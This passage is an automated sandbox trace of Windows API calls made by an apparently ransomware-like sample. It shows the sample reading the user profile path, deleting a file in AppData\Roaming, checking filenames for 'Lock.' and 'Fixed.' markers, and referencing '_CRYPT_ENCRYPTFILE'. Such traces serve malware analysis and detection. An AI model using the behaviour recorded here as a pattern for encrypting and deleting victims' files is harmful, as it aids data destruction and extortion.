(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0241.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0241.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0241.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0241.250] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0241.250] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.250] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.251] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0241.251] FreeLibrary (hLibModule=0x756e0000) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.251] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0241.251] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.251] CloseHandle (hObject=0x2a0) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0241.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0241.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0241.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0241.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0241.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0241.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0241.256] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.256] CloseHandle (hObject=0x2d0) returned 1 [0241.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0241.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0241.260] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.263] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.263] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/yYa4EeIK4zJ1bJ59OB.rtf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf", lpFilePart=0x8cedf4*="yYa4EeIK4zJ1bJ59OB.rtf") returned 0x36 [0241.264] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yya4eeik4zj1bj59ob.rtf")) returned 0x20 [0241.264] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22717e40, ftCreationTime.dwHighDateTime=0x1d5f054, ftLastAccessTime.dwLowDateTime=0xa6d7d3c0, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xa6d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0xe9fe, dwReserved0=0x1, dwReserved1=0x1c, cFileName="yYa4EeIK4zJ1bJ59OB.rtf", cAlternateFileName="YYA4EE~1.RTF")) returned 0xa87250 [0241.264] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yya4eeik4zj1bj59ob.rtf")) returned 1 [0241.310] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22717e40, ftCreationTime.dwHighDateTime=0x1d5f054, ftLastAccessTime.dwLowDateTime=0xa6d7d3c0, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xa6d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0xe9fe, dwReserved0=0x1, dwReserved1=0x1c, cFileName="yYa4EeIK4zJ1bJ59OB.rtf", cAlternateFileName="YYA4EE~1.RTF")) returned 0 [0241.310] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0241.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0241.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.311] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.311] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0241.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6e) returned 0x2e564e0 [0241.312] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/yYa4EeIK4zJ1bJ59OB.rtf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf", lpFilePart=0x8cf650*="yYa4EeIK4zJ1bJ59OB.rtf") returned 0x36 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0241.312] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\yYa4EeIK4zJ1bJ59OB.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yya4eeik4zj1bj59ob.rtf")) returned 0xffffffff [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0241.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0241.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0241.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0241.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0241.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZBOT YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOT YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OT YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AwSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SRJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RJf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jf tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tb.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0241.314] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0241.314] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0241.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0241.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0241.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2f04690 [0241.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZBOT YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOT YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OT YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AwSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SRJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RJf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jf tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0241.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tb.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0241.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0241.316] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0241.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0241.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0241.316] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0241.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0241.317] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0241.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 